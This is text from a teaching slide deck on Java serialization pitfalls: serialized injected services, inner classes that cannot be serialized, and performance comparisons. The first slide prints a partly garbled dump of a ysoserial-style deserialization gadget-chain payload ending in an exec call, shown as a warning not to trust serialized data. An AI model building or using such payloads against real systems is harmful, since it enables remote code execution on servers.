former...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNamet..Ljava/lang/Stri g;[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp.... ..getRuntimeur..[Ljava.lang.Class;......Z....xp....t..getMethoduq.~......vr..ja a.lang.String...8z;.B...xpvq.~..sq.~..uq.~......puq.~......t..invokeuq.~......v ..java.lang.Object...........xpvq.~..sq.~..ur..[Ljava.lang.String;..V...{G...xp ...t."System.out.println(nnnnHello);t..execuq.~......q.~.#sq.~..sr..java.la g.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util. ashMap......`....F..loadFactorI..thresholdxp?@......w.........xxvr..java.lang.O erride...........xpq.~ Don't trust serialized data Y so seriAL https://github.com/frohoff/ysoserial
  66. 66. Inner/nested classes CDI/Spring/Singletons part 2 Common Pitfalls of Java Serialization part 3
  67. 67. ApplicationScoped Spring beans Singletons Services @ApplicationScoped class FooService { void foo() {} } class Bar implements Serializable { @Inject private FooService fooService; void doSomething() { fooService.foo(); } }
  68. 68. ApplicationScoped Spring beans Singletons Services @ApplicationScoped class FooService { void foo() {} } class Bar implements Serializable { @Inject private FooService fooService; void doSomething() { fooService.foo(); } } • Serializes too much (possibly whole service layer) • Deserializes to non-managed services • Deserialization gives multiple instances of one service
  69. 69. ApplicationScoped Spring beans Singletons Services @ApplicationScoped class FooService { void foo() {} } class Bar implements Serializable { @Inject private FooService fooService; void doSomething() { fooService.foo(); } } • Use a serializable proxy that looks up service (CDI) • Use readResolve/writeReplace for custom serialization/deserialization • CDI @Singleton injection *doesn't* inject a serializable proxy, but the instance directly
  70. 70. Inner/nested classes CDI/Spring/Singletons part 2 Common Pitfalls of Java Serialization part 3
  71. 71. Inner/Nested classes class FooService { class Bar implements Serializable {} public Bar getBar() { return new Bar(); } } ObjectOutputStream oos = ...; FooService service = ...; Bar bar = service.getBar(); oos.writeObject(bar); Which is true? gives compilation error at one of last two lines bar gets serialized Exception is thrown
  72. 72. Inner/Nested classes class FooService { class Bar implements Serializable {} public Bar getBar() { return new Bar(); } } ObjectOutputStream oos = ...; FooService service = ...; Bar bar = service.getBar(); oos.writeObject(bar); Which is true? gives compilation error at one of last two lines bar gets serialized Exception is thrown
  73. 73. Inner/Nested classes class FooService { class Bar implements Serializable {} public Bar getBar() { return new Bar(); } } ObjectOutputStream oos = ...; FooService service = ...; Bar bar = service.getBar(); oos.writeObject(bar); Not serializable requires a Foo instance
  74. 74. Agenda 1. What is (Java) Serialization? 2. How does Java Serialization work? 3. Common Pitfalls of Serialization 4. Summary
  75. 75. Summary • Versatile • Flexible • Complete • Complex Java serialization is • Insecure Java deserialization is
  76. 76. performance considerations java XML/JAXB source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki
  77. 77. size considerations java XML/JAXB source, 27-10-2016: https://github.com/eishay/jvm-serializers/wiki

×